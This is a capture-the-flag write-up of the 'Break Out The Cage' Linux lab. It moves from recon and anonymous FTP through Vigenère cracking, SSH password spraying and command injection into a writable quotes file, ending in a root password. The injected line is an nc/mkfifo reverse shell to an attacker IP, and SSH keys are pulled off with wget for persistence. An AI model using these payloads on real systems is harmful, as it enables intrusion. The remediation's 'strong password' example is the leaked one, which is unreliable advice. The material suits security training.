[Linux] Break Out The Cage

Reconnaissance

sudo nmap 10.10.211.144

sudo nmap -A -p 21,22,80 10.10.211.144

Enumeration

HTTP

gobuster dir -u http://10.10.211.144/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

FTP

FTP allows anonymous login, so we can try to connect to the ftp server. We grab a file called "dad_tasks" which we can read the content.

ftp 10.10.211.144

*

Cryptanalysis x OSINT

The content of the file seems to be base64 encoded.

The will contain something crypted.

We use dcode.fr to identify the type of encryption which has been. Viginere has a strong probaility to have been used. The plateform Vigenere Solver breaks the cyphered text. The keyis namelesstwo.

Dads Tasks - The RAGE...THE CAGE... THE MAN... THE LEGEND!!!!
One. Revamp the website
Two. Put more quotes in script
Three. Buy bee pesticide
Four. Help him with acting lessons
Five. Teach Dad what "information security" is.

In case I forget.... Mydadisghostrideraintthatcoolnocausehesonfirejokes

Mydadisghostrideraintthatcoolnocausehesonfirejokes could be a password. So we need to know who it belongs to. As the writter says these tasks are for his/her father who is the Ghost Rider so can conclude that the author is one of Nicholas Cage children.

Nicholas Cage has three childs: Weston, Kal-El, August.

Exploitation

SSH

We can performa password spraying attack on the ssh service. We can login with the password we find.

Lateralisation

The message below keeps popping up over the screen.

                                                                               
Broadcast message from cage@national-treasure (somewhere) (Wed Oct 30 12:39:01 
                                                                               
Shoot him again... His soul's still dancing. \u2014 Bad Lieutenant: Port Of Call
                                                                               

Some probably, a script in running in background. We can use pspy to find it. First we upload pspy on the target.

We got the program which display the message on the screen.

It is the program /opt/.dads_scripts/spread_the_quotes.py.

This script uses display the content of the file at /opt/.dads_scripts/.files/.quotes which we have the right to modify.

We will use this file to obtain a reverse shell on cage account as he is the owner of the file.

echo ";rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.94.7 4242 >/tmp/f" > .quotes

We can get a stable shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z
stty raw -echo; fg 

Persistence

We can export the ssh keys for persistence.

python -m http.server # target machine

wget http://10.10.211.144:8000/id_rsa
wget http://10.10.211.144:8000/id_rsa.pub

Escalation

In the email_3 we got something which seems crypted: haiinspsyanileph.

It is vigenere encoded withe the key "FACE".

We get the root password that way: root:cageisnotalegend

Remediation

To secure the system, consider these actions:

1. Use scp instead of FTP for secure file transfers.

2. Disable SSH password-based login in favor of key-based authentication.

3. Implement strong passwords, e.g., Mydadisghostrideraintthatcoolnocausehesonfirejokes.

4. Review and restrict file access permissions, particularly on sensitive files like .quotes.

References

• All About Nicolas Cage's Children

• Wikipedia: Nicolas Cage